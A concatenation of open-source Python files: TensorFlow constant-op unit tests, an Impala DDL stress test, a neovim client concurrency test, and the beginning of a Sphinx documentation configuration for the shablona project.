  def testShapeInconsistent(self):
    # A too-large shape pads the constant rather than failing.
    with tf.Graph().as_default():
      c = tf.constant([1, 2, 3, 4, 5, 6, 7], shape=[10])
    self.assertEqual(c.get_shape(), [10])

  # pylint: disable=g-long-lambda
  def testShapeWrong(self):
    with tf.Graph().as_default():
      with self.assertRaisesWithPredicateMatch(
          ValueError,
          lambda e: ("Too many elements provided. Needed at most 5, "
                     "but received 7" == str(e))):
        tf.constant([1, 2, 3, 4, 5, 6, 7], shape=[5])
  # pylint: enable=g-long-lambda

  def testTooLargeConstant(self):
    # A single tensor proto may not exceed 2GB.
    with tf.Graph().as_default():
      large_array = np.zeros((512, 1024, 1024), dtype=np.float32)
      with self.assertRaisesRegexp(
          ValueError,
          "Cannot create a tensor proto whose content is larger than 2GB."):
        c = tf.constant(large_array)

  def testTooLargeGraph(self):
    # Two 1GB constants fit individually, but the GraphDef caps at 2GB.
    with tf.Graph().as_default() as g:
      large_array = np.zeros((256, 1024, 1024), dtype=np.float32)
      c = tf.constant(large_array)
      d = tf.constant(large_array)
      with self.assertRaisesRegexp(
          ValueError, "GraphDef cannot be larger than 2GB."):
        g.as_graph_def()

  def testSparseValuesRaiseErrors(self):
    # Ragged nested lists are rejected.
    with self.assertRaisesRegexp(ValueError,
                                 "setting an array element with a sequence"):
      c = tf.constant([[1, 2], [3]], dtype=tf.int32)

    with self.assertRaisesRegexp(ValueError, "must be a dense"):
      c = tf.constant([[1, 2], [3]])

    with self.assertRaisesRegexp(ValueError, "must be a dense"):
      c = tf.constant([[1, 2], [3], [4, 5]])
class AsTensorTest(tf.test.TestCase):
  """Tests tf.convert_to_tensor on Tensors, numbers, TensorShapes and
  Dimensions."""

  def testAsTensorForTensorInput(self):
    # An existing Tensor is returned unchanged (same object).
    with tf.Graph().as_default():
      t = tf.constant(10.0)
      x = tf.convert_to_tensor(t)
    self.assertIs(t, x)

  def testAsTensorForNonTensorInput(self):
    with tf.Graph().as_default():
      x = tf.convert_to_tensor(10.0)
    self.assertTrue(isinstance(x, tf.Tensor))

  def testAsTensorForShapeInput(self):
    # Fully-defined TensorShapes convert to int32 (or requested int64)
    # vectors; partially-known shapes and float dtypes are rejected.
    with self.test_session():
      x = tf.convert_to_tensor(tf.TensorShape([]))
      self.assertEqual(tf.int32, x.dtype)
      self.assertAllEqual([], x.eval())

      x = tf.convert_to_tensor(tf.TensorShape([1, 2, 3]))
      self.assertEqual(tf.int32, x.dtype)
      self.assertAllEqual([1, 2, 3], x.eval())

      x = tf.convert_to_tensor(tf.TensorShape([1, 2, 3]), dtype=tf.int64)
      self.assertEqual(tf.int64, x.dtype)
      self.assertAllEqual([1, 2, 3], x.eval())

      x = tf.reshape(tf.zeros([6]), tf.TensorShape([2, 3]))
      self.assertAllEqual([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], x.eval())

    with self.assertRaisesRegexp(ValueError, "partially known"):
      tf.convert_to_tensor(tf.TensorShape(None))

    with self.assertRaisesRegexp(ValueError, "partially known"):
      tf.convert_to_tensor(tf.TensorShape([1, None, 64]))

    with self.assertRaises(TypeError):
      tf.convert_to_tensor(tf.TensorShape([1, 2, 3]), dtype=tf.float32)

  def testAsTensorForDimensionInput(self):
    # A known Dimension converts to a scalar; unknown ones are rejected.
    with self.test_session():
      x = tf.convert_to_tensor(tf.TensorShape([1, 2, 3])[1])
      self.assertEqual(tf.int32, x.dtype)
      self.assertAllEqual(2, x.eval())

      x = tf.convert_to_tensor(tf.TensorShape([1, 2, 3])[1], dtype=tf.int64)
      self.assertEqual(tf.int64, x.dtype)
      self.assertAllEqual(2, x.eval())

    with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
      tf.convert_to_tensor(tf.TensorShape(None)[1])

    with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
      tf.convert_to_tensor(tf.TensorShape([1, None, 64])[1])

    with self.assertRaises(TypeError):
      tf.convert_to_tensor(tf.TensorShape([1, 2, 3])[1], dtype=tf.float32)
class IdentityOpTest(tf.test.TestCase):
  """Minimal check of the Identity op's graph construction."""

  def testIdTensor(self):
    with tf.Graph().as_default():
      source = tf.constant(2.0, shape=[6], name="input")
      identity = tf.identity(source, name="id")
      # The op must consume the constant as a Tensor input and produce
      # exactly this NodeDef.
      self.assertTrue(isinstance(identity.op.inputs[0], tf.Tensor))
      self.assertProtoEquals(
          "name: 'id' op: 'Identity' input: 'input' "
          "attr { key: 'T' value { type: DT_FLOAT } }", identity.op.node_def)
class ZerosTest(tf.test.TestCase):
  """Tests tf.zeros with static shapes, dynamic shapes and all dtypes."""

  def _Zeros(self, shape):
    # Build, shape-check and evaluate tf.zeros(shape).
    with self.test_session():
      ret = tf.zeros(shape)
      self.assertEqual(shape, ret.get_shape())
      return ret.eval()

  def testConst(self):
    self.assertTrue(np.array_equal(self._Zeros([2, 3]), np.array([[0] * 3] *
                                                                 2)))

  def testScalar(self):
    self.assertEqual(0, self._Zeros([]))
    self.assertEqual(0, self._Zeros(()))
    with self.test_session():
      scalar = tf.zeros(tf.constant([], dtype=tf.int32))
      self.assertEqual(0, scalar.eval())

  def testDynamicSizes(self):
    np_ans = np.array([[0] * 3] * 2)
    with self.test_session():
      # Creates a tensor of 2 x 3.
      d = tf.fill([2, 3], 12., name="fill")
      # Constructs a tensor of zeros of the same dimensions as "d".
      z = tf.zeros(tf.shape(d))
      out = z.eval()
    self.assertAllEqual(np_ans, out)
    self.assertShapeEqual(np_ans, d)
    self.assertShapeEqual(np_ans, z)

  def testDtype(self):
    with self.test_session():
      d = tf.fill([2, 3], 12., name="fill")
      self.assertEqual(d.get_shape(), [2, 3])
      # Test default type for both constant size and dynamic size
      z = tf.zeros([2, 3])
      self.assertEqual(z.dtype, tf.float32)
      self.assertEqual([2, 3], z.get_shape())
      self.assertAllEqual(z.eval(), np.zeros([2, 3]))
      z = tf.zeros(tf.shape(d))
      self.assertEqual(z.dtype, tf.float32)
      self.assertEqual([2, 3], z.get_shape())
      self.assertAllEqual(z.eval(), np.zeros([2, 3]))
      # Test explicit type control
      for dtype in [tf.float32, tf.float64, tf.int32,
                    tf.uint8, tf.int16, tf.int8,
                    tf.complex64, tf.complex128, tf.int64, tf.bool]:
        z = tf.zeros([2, 3], dtype=dtype)
        self.assertEqual(z.dtype, dtype)
        self.assertEqual([2, 3], z.get_shape())
        self.assertAllEqual(z.eval(), np.zeros([2, 3]))
        z = tf.zeros(tf.shape(d), dtype=dtype)
        self.assertEqual(z.dtype, dtype)
        self.assertEqual([2, 3], z.get_shape())
        self.assertAllEqual(z.eval(), np.zeros([2, 3]))
class ZerosLikeTest(tf.test.TestCase):
  """Tests tf.zeros_like for dtype, shape and value correctness."""

  def _compareZeros(self, dtype, use_gpu):
    # BUG FIX: ``use_gpu`` was previously ignored (test_session was
    # hard-coded to use_gpu=False), so testZerosLikeGPU never actually
    # exercised GPU placement.
    with self.test_session(use_gpu=use_gpu):
      # Creates a tensor of non-zero values with shape 2 x 3.
      numpy_dtype = dtype.as_numpy_dtype
      d = tf.constant(np.ones((2, 3), dtype=numpy_dtype), dtype=dtype)
      # Constructs a tensor of zeros of the same dimensions and type as "d".
      z_var = tf.zeros_like(d)
      # Test that the type is correct
      self.assertEqual(z_var.dtype, dtype)
      z_value = z_var.eval()
    # Test that the value is correct
    self.assertTrue(np.array_equal(z_value, np.array([[0] * 3] * 2)))
    self.assertEqual([2, 3], z_var.get_shape())

  def testZerosLikeCPU(self):
    for dtype in [tf.float32, tf.float64, tf.int32, tf.uint8, tf.int16,
                  tf.int8, tf.complex64, tf.complex128, tf.int64]:
      self._compareZeros(dtype, False)

  def testZerosLikeGPU(self):
    for dtype in [tf.float32, tf.float64, tf.int32]:
      self._compareZeros(dtype, True)

  def testZerosLikePartialShape(self):
    # Partially-known input shapes must be preserved.
    d = tf.placeholder(tf.float32, shape=[None, 4, None])
    z = tf.zeros_like(d)
    self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())

  def testZerosLikeDtype(self):
    # Make sure zeros_like works even for dtypes that cannot be cast between
    with self.test_session():
      shape = (3, 5)
      dtypes = np.float32, np.complex64
      for in_type in dtypes:
        x = np.arange(15).astype(in_type).reshape(*shape)
        for out_type in dtypes:
          y = tf.zeros_like(x, dtype=out_type).eval()
          self.assertEqual(y.dtype, out_type)
          self.assertEqual(y.shape, shape)
          self.assertAllEqual(y, np.zeros(shape, dtype=out_type))
class OnesTest(tf.test.TestCase):
  """Tests tf.ones with static, dynamic and placeholder-driven shapes."""

  def _Ones(self, shape):
    # Build, shape-check and evaluate tf.ones(shape).
    with self.test_session():
      ret = tf.ones(shape)
      self.assertEqual(shape, ret.get_shape())
      return ret.eval()

  def testConst(self):
    self.assertTrue(np.array_equal(self._Ones([2, 3]), np.array([[1] * 3] * 2)))

  def testScalar(self):
    self.assertEqual(1, self._Ones([]))
    self.assertEqual(1, self._Ones(()))
    with self.test_session():
      scalar = tf.ones(tf.constant([], dtype=tf.int32))
      self.assertEqual(1, scalar.eval())

  def testDynamicSizes(self):
    np_ans = np.array([[1] * 3] * 2)
    with self.test_session():
      # Creates a tensor of 2 x 3.
      d = tf.fill([2, 3], 12., name="fill")
      # Constructs a tensor of ones of the same dimensions as "d".
      z = tf.ones(tf.shape(d))
      out = z.eval()
    self.assertAllEqual(np_ans, out)
    self.assertShapeEqual(np_ans, d)
    self.assertShapeEqual(np_ans, z)

  def testAutoPack(self):
    # A shape built from scalar placeholders is packed automatically.
    with self.test_session():
      h = tf.placeholder(tf.int32, shape=[])
      w = tf.placeholder(tf.int32, shape=[])
      z = tf.ones([h, w])
      out = z.eval(feed_dict={h: 4, w: 16})
    self.assertAllEqual(out, np.array([[1] * 16] * 4))

  def testDtype(self):
    with self.test_session():
      d = tf.fill([2, 3], 12., name="fill")
      self.assertEqual(d.get_shape(), [2, 3])
      # Test default type for both constant size and dynamic size
      z = tf.ones([2, 3])
      self.assertEqual(z.dtype, tf.float32)
      self.assertEqual([2, 3], z.get_shape())
      self.assertAllEqual(z.eval(), np.ones([2, 3]))
      z = tf.ones(tf.shape(d))
      self.assertEqual(z.dtype, tf.float32)
      self.assertEqual([2, 3], z.get_shape())
      self.assertAllEqual(z.eval(), np.ones([2, 3]))
      # Test explicit type control
      for dtype in (tf.float32, tf.float64, tf.int32,
                    tf.uint8, tf.int16, tf.int8,
                    tf.complex64, tf.complex128, tf.int64, tf.bool):
        z = tf.ones([2, 3], dtype=dtype)
        self.assertEqual(z.dtype, dtype)
        self.assertEqual([2, 3], z.get_shape())
        self.assertAllEqual(z.eval(), np.ones([2, 3]))
        z = tf.ones(tf.shape(d), dtype=dtype)
        self.assertEqual(z.dtype, dtype)
        self.assertEqual([2, 3], z.get_shape())
        self.assertAllEqual(z.eval(), np.ones([2, 3]))
class OnesLikeTest(tf.test.TestCase):
  """Tests for tf.ones_like: dtype/shape propagation and values."""

  def testOnesLike(self):
    """ones_like must copy dtype and shape and fill with ones."""
    dtypes_to_check = [tf.float32, tf.float64, tf.int32,
                       tf.uint8, tf.int16, tf.int8,
                       tf.complex64, tf.complex128, tf.int64]
    for dtype in dtypes_to_check:
      np_dtype = dtype.as_numpy_dtype
      with self.test_session():
        # Source tensor of non-zero values with shape 2 x 3.
        source = tf.constant(np.ones((2, 3), dtype=np_dtype), dtype=dtype)
        # Tensor of ones with the same dimensions and type as the source.
        ones_var = tf.ones_like(source)
        # The dtype must carry over unchanged.
        self.assertEqual(ones_var.dtype, dtype)
        result = ones_var.eval()
        # Every element must be exactly one.
        self.assertTrue(np.array_equal(result, np.array([[1] * 3] * 2)))
        self.assertEqual([2, 3], ones_var.get_shape())

  def testOnesLikePartialShape(self):
    """Unknown dimensions of the input must remain unknown in the output."""
    source = tf.placeholder(tf.float32, shape=[None, 4, None])
    ones_var = tf.ones_like(source)
    self.assertEqual(source.get_shape().as_list(),
                     ones_var.get_shape().as_list())
class FillTest(tf.test.TestCase):
  """Tests for tf.fill across dtypes, plus shape-inference and gradients."""

  def _compare(self, dims, val, np_ans, use_gpu):
    """Run tf.fill(dims, val) on CPU or GPU and compare against np_ans."""
    with self.test_session(use_gpu=use_gpu):
      tf_ans = tf.fill(dims, val, name="fill")
      out = tf_ans.eval()
    self.assertAllClose(np_ans, out)
    # Fill does not set the shape.
    # self.assertShapeEqual(np_ans, tf_ans)

  def _compareAll(self, dims, val, np_ans):
    """Compare on both CPU and GPU."""
    self._compare(dims, val, np_ans, False)
    self._compare(dims, val, np_ans, True)

  def testFillFloat(self):
    np_ans = np.array([[3.1415] * 3] * 2).astype(np.float32)
    self._compareAll([2, 3], np_ans[0][0], np_ans)

  def testFillDouble(self):
    np_ans = np.array([[3.1415] * 3] * 2).astype(np.float64)
    self._compareAll([2, 3], np_ans[0][0], np_ans)

  def testFillInt32(self):
    np_ans = np.array([[42] * 3] * 2).astype(np.int32)
    self._compareAll([2, 3], np_ans[0][0], np_ans)

  def testFillInt64(self):
    np_ans = np.array([[-42] * 3] * 2).astype(np.int64)
    self._compareAll([2, 3], np_ans[0][0], np_ans)

  def testFillComplex64(self):
    # Complex fill is CPU-only here.
    np_ans = np.array([[0.15] * 3] * 2).astype(np.complex64)
    self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)

  def testFillComplex128(self):
    # Complex fill is CPU-only here.
    np_ans = np.array([[0.15] * 3] * 2).astype(np.complex128)
    self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)

  def testFillString(self):
    """String fill works on CPU with byte-string values."""
    np_ans = np.array([[b"yolo"] * 3] * 2)
    with self.test_session(use_gpu=False):
      tf_ans = tf.fill([2, 3], np_ans[0][0], name="fill").eval()
    self.assertAllEqual(np_ans, tf_ans)

  def testFillNegative(self):
    """Negative dims fail in Python when static, at run time when fed."""
    with self.test_session():
      for shape in (-1,), (2, -1), (-1, 2):
        with self.assertRaises(ValueError):
          tf.fill(shape, 7)
      # Using a placeholder so this won't be caught in Python.
      dims = tf.placeholder(tf.int32)
      fill_t = tf.fill(dims, 3.0)
      for shape in (-1,), (2, -1), (-1, 2):
        with self.assertRaises(tf.errors.InvalidArgumentError):
          fill_t.eval({dims: shape})

  def testShapeFunctionEdgeCases(self):
    """Shape inference rejects bad dims/values and handles partial info."""
    # Non-vector dimensions.
    with self.assertRaises(ValueError):
      tf.fill([[0, 1], [2, 3]], 1.0)
    # Non-scalar value.
    with self.assertRaises(ValueError):
      tf.fill([3, 2], [1.0, 2.0])
    # Partial dimension information.
    f = tf.fill(
        tf.placeholder(tf.int32, shape=(4,)), 3.0)
    self.assertEqual([None, None, None, None], f.get_shape().as_list())
    f = tf.fill([tf.placeholder(tf.int32, shape=()), 17], 1.0)
    self.assertEqual([None, 17], f.get_shape().as_list())

  def testGradient(self):
    """Numeric gradient of fill w.r.t. its scalar value is accurate."""
    with self.test_session():
      in_v = tf.constant(5.0)
      out_shape = [3, 2]
      out_filled = tf.fill(out_shape, in_v)
      err = tf.test.compute_gradient_error(in_v, [],
                                           out_filled, out_shape)
    self.assertLess(err, 1e-3)
class PlaceholderTest(tf.test.TestCase):
  """Tests for tf.placeholder: feeding, shape checking, and repr."""

  def testDtype(self):
    """An unshaped placeholder accepts a feed but fails when not fed."""
    with self.test_session():
      p = tf.placeholder(tf.float32, name="p")
      p_identity = tf.identity(p)
      feed_array = np.random.rand(10, 10)
      self.assertAllClose(p_identity.eval(feed_dict={p: feed_array}),
                          feed_array)
      # Evaluating without a feed must raise the op-level error.
      with self.assertRaisesOpError(
          "must feed a value for placeholder tensor 'p' with dtype float"):
        p_identity.eval()

  def testShape(self):
    """A fully-shaped placeholder rejects mis-shaped feeds in Python."""
    with self.test_session():
      p = tf.placeholder(tf.float32, shape=(10, 10), name="p")
      p_identity = tf.identity(p)
      feed_array = np.random.rand(10, 10)
      self.assertAllClose(p_identity.eval(feed_dict={p: feed_array}),
                          feed_array)
      with self.assertRaisesOpError(
          "must feed a value for placeholder tensor 'p' with dtype float and "
          r"shape \[10,10\]"):
        p_identity.eval()
      # Wrong-shape feeds are caught client-side as a ValueError.
      with self.assertRaisesWithPredicateMatch(
          ValueError, lambda e: "Cannot feed value of shape" in str(e)):
        p_identity.eval(feed_dict={p: feed_array[:5, :5]})

  def testPartialShape(self):
    """Only the known dimensions of a partial shape are enforced."""
    with self.test_session():
      p = tf.placeholder(tf.float32, shape=[None, 3], name="p")
      p_identity = tf.identity(p)
      feed_array = np.random.rand(10, 3)
      self.assertAllClose(p_identity.eval(feed_dict={p: feed_array}),
                          feed_array)
      with self.assertRaisesWithPredicateMatch(
          ValueError, lambda e: "Cannot feed value of shape" in str(e)):
        p_identity.eval(feed_dict={p: feed_array[:5, :2]})

  def testControlDependency(self):
    """A fed placeholder can be used as a control dependency."""
    with self.test_session():
      p = tf.placeholder(tf.int32, shape=[], name="p")
      with tf.control_dependencies([p]):
        c = tf.constant(5, tf.int32)
      d = tf.mul(p, c)
      self.assertEqual(10, d.eval(feed_dict={p: 2}))

  def testBadShape(self):
    # Negative dimensions are rejected at construction time.
    with self.assertRaises(ValueError):
      tf.placeholder(tf.float32, shape=(-1, 10))

  def testTensorStr(self):
    """repr() shows unknown shapes as <unknown> and unknown dims as '?'."""
    a = tf.placeholder(tf.float32, name="a")
    self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
    b = tf.placeholder(tf.int32, shape=(32, 40), name="b")
    self.assertEqual(
        "<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>",
        repr(b))
    c = tf.placeholder(tf.qint32, shape=(32, None, 2), name="c")
    self.assertEqual(
        "<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>",
        repr(c))
class PlaceholderV2Test(tf.test.TestCase):
  """Tests for array_ops.placeholder_v2, mirroring PlaceholderTest."""

  def testDtype(self):
    """An unshaped placeholder accepts a feed but fails when not fed."""
    with self.test_session():
      p = array_ops.placeholder_v2(tf.float32, shape=None, name="p")
      p_identity = tf.identity(p)
      feed_array = np.random.rand(10, 10)
      self.assertAllClose(
          p_identity.eval(feed_dict={
              p: feed_array
          }), feed_array)
      with self.assertRaisesOpError(
          "must feed a value for placeholder tensor 'p' with dtype float"):
        p_identity.eval()

  def testShape(self):
    """A fully-shaped placeholder rejects mis-shaped feeds in Python."""
    with self.test_session():
      p = array_ops.placeholder_v2(tf.float32, shape=(10, 10), name="p")
      p_identity = tf.identity(p)
      feed_array = np.random.rand(10, 10)
      self.assertAllClose(
          p_identity.eval(feed_dict={
              p: feed_array
          }), feed_array)
      with self.assertRaisesOpError(
          "must feed a value for placeholder tensor 'p' with dtype float and "
          r"shape \[10,10\]"):
        p_identity.eval()
      with self.assertRaisesWithPredicateMatch(
          ValueError, lambda e: "Cannot feed value of shape" in str(e)):
        p_identity.eval(feed_dict={p: feed_array[:5, :5]})

  def testUnknownShape(self):
    """shape=None places no constraint on the rank or size of the feed."""
    with self.test_session():
      p = array_ops.placeholder_v2(tf.float32, shape=None, name="p")
      p_identity = tf.identity(p)
      # can feed anything
      feed_array = np.random.rand(10, 3)
      self.assertAllClose(
          p_identity.eval(feed_dict={
              p: feed_array
          }), feed_array)
      feed_array = np.random.rand(4, 2, 5)
      self.assertAllClose(
          p_identity.eval(feed_dict={
              p: feed_array
          }), feed_array)

  def testScalarShape(self):
    """shape=[] accepts a scalar feed."""
    with self.test_session():
      p = array_ops.placeholder_v2(tf.float32, shape=[], name="p")
      p_identity = tf.identity(p)
      self.assertAllClose(p_identity.eval(feed_dict={p: 5}), 5)

  def testPartialShape(self):
    """Only the known dimensions of a partial shape are enforced."""
    with self.test_session():
      p = array_ops.placeholder_v2(tf.float32, shape=[None, 3], name="p")
      p_identity = tf.identity(p)
      feed_array = np.random.rand(10, 3)
      self.assertAllClose(
          p_identity.eval(feed_dict={
              p: feed_array
          }), feed_array)
      with self.assertRaisesWithPredicateMatch(
          ValueError, lambda e: "Cannot feed value of shape" in str(e)):
        p_identity.eval(feed_dict={p: feed_array[:5, :2]})

  def testControlDependency(self):
    """A fed placeholder can be used as a control dependency."""
    with self.test_session():
      p = array_ops.placeholder_v2(tf.int32, shape=[], name="p")
      with tf.control_dependencies([p]):
        c = tf.constant(5, tf.int32)
      d = tf.mul(p, c)
      # BUG FIX: this used np.int, a deprecated (and since-removed) NumPy
      # alias for the builtin int; use the builtin directly — identical
      # behavior, no deprecation warning / AttributeError on modern NumPy.
      val = np.array(2).astype(int)
      self.assertEqual(10, d.eval(feed_dict={p: val}))

  def testBadShape(self):
    # Negative dimensions are rejected at construction time.
    with self.assertRaises(ValueError):
      array_ops.placeholder_v2(tf.float32, shape=(-1, 10))

  def testTensorStr(self):
    """repr() shows unknown shapes as <unknown> and unknown dims as '?'."""
    a = array_ops.placeholder_v2(tf.float32, shape=None, name="a")
    self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
    b = array_ops.placeholder_v2(tf.int32, shape=(32, 40), name="b")
    self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
    c = array_ops.placeholder_v2(tf.qint32, shape=(32, None, 2), name="c")
    self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderWithDefaultTest(tf.test.TestCase):
  """Tests for tf.placeholder_with_default under full/partial/no shapes."""

  def testFullShape(self):
    """Default is returned unfed; feeds must match the full static shape."""
    with self.test_session():
      placeholder = tf.placeholder_with_default([[2, 2], [2, 2]], shape=[2, 2])
      out = tf.identity(placeholder)
      # Without a feed the default value flows through.
      self.assertAllEqual([[2, 2], [2, 2]], out.eval())
      # A correctly-shaped feed overrides the default.
      self.assertAllEqual([[3, 3], [3, 3]],
                          out.eval(feed_dict={placeholder: [[3, 3], [3, 3]]}))
      # A mis-shaped feed is rejected client-side.
      with self.assertRaises(ValueError):
        out.eval(feed_dict={placeholder: [[6, 6, 6], [6, 6, 6]]})

  def testPartialShape(self):
    """Only the known dimensions are enforced when the shape is partial."""
    with self.test_session():
      placeholder = tf.placeholder_with_default([1, 2, 3], shape=[None])
      out = tf.identity(placeholder)
      self.assertAllEqual([1, 2, 3], out.eval())
      # Any vector length is accepted.
      self.assertAllEqual([3, 37], out.eval(feed_dict={placeholder: [3, 37]}))
      # A rank mismatch is still rejected.
      with self.assertRaises(ValueError):
        out.eval(feed_dict={placeholder: [[2, 2], [2, 2]]})

  def testNoShape(self):
    """shape=None allows feeds of any rank and size."""
    with self.test_session():
      placeholder = tf.placeholder_with_default([17], shape=None)
      out = tf.identity(placeholder)
      self.assertAllEqual([17], out.eval())
      self.assertAllEqual([3, 37], out.eval(feed_dict={placeholder: [3, 37]}))
      self.assertAllEqual([[3, 3], [3, 3]],
                          out.eval(feed_dict={placeholder: [[3, 3], [3, 3]]}))
# Run every test case in this module when executed as a script.
if __name__ == "__main__":
  tf.test.main()
| kamcpp/tensorflow | tensorflow/python/kernel_tests/constant_op_test.py | Python | apache-2.0 | 26,533 |
#!/usr/bin/env python
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import re
import uuid
from subprocess import call
from tests.common.test_vector import TestDimension
from tests.common.impala_test_suite import ImpalaTestSuite
# Number of tables to create per thread
NUM_TBLS_PER_THREAD = 10
# Each client will get a different test id.
# NOTE: xrange is Python 2 only; this module targets Python 2 throughout.
TEST_IDS = xrange(0, 10)
class TestDdlStress(ImpalaTestSuite):
  """Simple stress test for DDL operations.

  Attempts to create, cache, uncache, then drop many different tables in
  parallel (each pytest client runs with a distinct 'test_id' dimension).
  """

  @classmethod
  def get_workload(cls):
    # FIX: this is a classmethod, so the first parameter is the class;
    # it was previously misnamed 'self' (add_test_dimensions already
    # uses 'cls'). No caller-visible change.
    return 'targeted-stress'

  @classmethod
  def add_test_dimensions(cls):
    """Constrain the matrix to default batch size on uncompressed text."""
    super(TestDdlStress, cls).add_test_dimensions()
    cls.TestMatrix.add_dimension(TestDimension('test_id', *TEST_IDS))
    cls.TestMatrix.add_constraint(lambda v: v.get_value('exec_option')['batch_size'] == 0)
    cls.TestMatrix.add_constraint(lambda v:\
        v.get_value('table_format').file_format == 'text' and\
        v.get_value('table_format').compression_codec == 'none')

  @pytest.mark.stress
  def test_create_cache_many_tables(self, vector):
    """Create, populate, (un)cache and drop NUM_TBLS_PER_THREAD table pairs."""
    self.client.set_configuration(vector.get_value('exec_option'))
    self.client.execute("create database if not exists ddl_stress_testdb")
    self.client.execute("use ddl_stress_testdb")
    # Unique suffix so concurrent clients never collide on table names.
    tbl_uniquifier = str(uuid.uuid4()).replace('-', '')
    for i in xrange(NUM_TBLS_PER_THREAD):
      tbl_name = "tmp_%s_%s" % (tbl_uniquifier, i)
      # Create a partitioned and unpartitioned table
      self.client.execute("create table %s (i int)" % tbl_name)
      self.client.execute("create table %s_part (i int) partitioned by (j int)" %\
          tbl_name)
      # Add some data to each
      self.client.execute("insert overwrite table %s select int_col from "\
          "functional.alltypestiny" % tbl_name)
      self.client.execute("insert overwrite table %s_part partition(j) "\
          "values (1, 1), (2, 2), (3, 3), (4, 4), (4, 4)" % tbl_name)
      # Cache the data the unpartitioned table
      self.client.execute("alter table %s set cached in 'testPool'" % tbl_name)
      # Cache, uncache, then re-cache the data in the partitioned table.
      self.client.execute("alter table %s_part set cached in 'testPool'" % tbl_name)
      self.client.execute("alter table %s_part set uncached" % tbl_name)
      self.client.execute("alter table %s_part set cached in 'testPool'" % tbl_name)
      # Drop the tables, this should remove the cache requests.
      self.client.execute("drop table %s" % tbl_name)
      self.client.execute("drop table %s_part" % tbl_name)
| mapr/impala | tests/stress/test_ddl_stress.py | Python | apache-2.0 | 3,153 |
from nose.tools import with_setup, eq_ as eq
from common import vim, cleanup
from threading import Timer
@with_setup(setup=cleanup)
def test_interrupt_from_another_thread():
    """Stopping the session from a timer thread unblocks next_message()."""
    session = vim.session

    def stop_session():
        # Must go through threadsafe_call: stopping directly from a
        # foreign thread is not safe.
        session.threadsafe_call(session.stop)

    Timer(0.5, stop_session).start()
    # The blocking read returns None once the session has been stopped.
    eq(session.next_message(), None)
| traverseda/python-client | test/test_concurrency.py | Python | apache-2.0 | 341 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# shablona documentation build configuration file, created by
# sphinx-quickstart on Tue Apr 14 10:29:06 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# General information about the project.
project = 'shablona'
copyright = '2015, Ariel Rokem'
currentdir = os.path.abspath(os.path.dirname(__file__))
ver_file = os.path.join(currentdir, '..', project, 'version.py')
# Execute version.py to pick up the package version without importing the
# package. NOTE(review): exec on file contents is only acceptable here
# because version.py is part of this repository (trusted input); assumes
# version.py defines __version__ — confirm.
with open(ver_file) as f:
    exec(f.read())
source_version = __version__
# NOTE: currentdir is recomputed here with the identical value as above;
# the second assignment is redundant but harmless.
currentdir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(currentdir, 'tools'))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0'  # numpydoc requires sphinx >= 1.0
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
sys.path.append(os.path.abspath('sphinxext'))
extensions = ['sphinx.ext.autodoc',
              'sphinx.ext.doctest',
              'sphinx.ext.intersphinx',
              'sphinx.ext.todo',
              'sphinx.ext.coverage',
              'sphinx.ext.ifconfig',
              'sphinx.ext.autosummary',
              'sphinx.ext.mathjax',
              'math_dollar',  # has to go before numpydoc
              'numpydoc',
              'github',
              'sphinx_gallery.gen_gallery']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# --- Sphinx Gallery ---
sphinx_gallery_conf = {
    # path to your examples scripts
    'examples_dirs': '../examples',
    # path where to save gallery generated examples
    'gallery_dirs': 'auto_examples',
    # To auto-generate example sections in the API
    'doc_module': ('shablona',),
    # Auto-generated mini-galleries go here
    'backreferences_dir': 'gen_api'
}
# Automatically generate stub pages for API
autosummary_generate = True
# NOTE(review): autodoc_default_flags was deprecated in Sphinx 1.8 in
# favor of autodoc_default_options — fine for the Sphinx versions this
# project targets, worth updating on a Sphinx upgrade.
autodoc_default_flags = ['members', 'inherited-members']
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
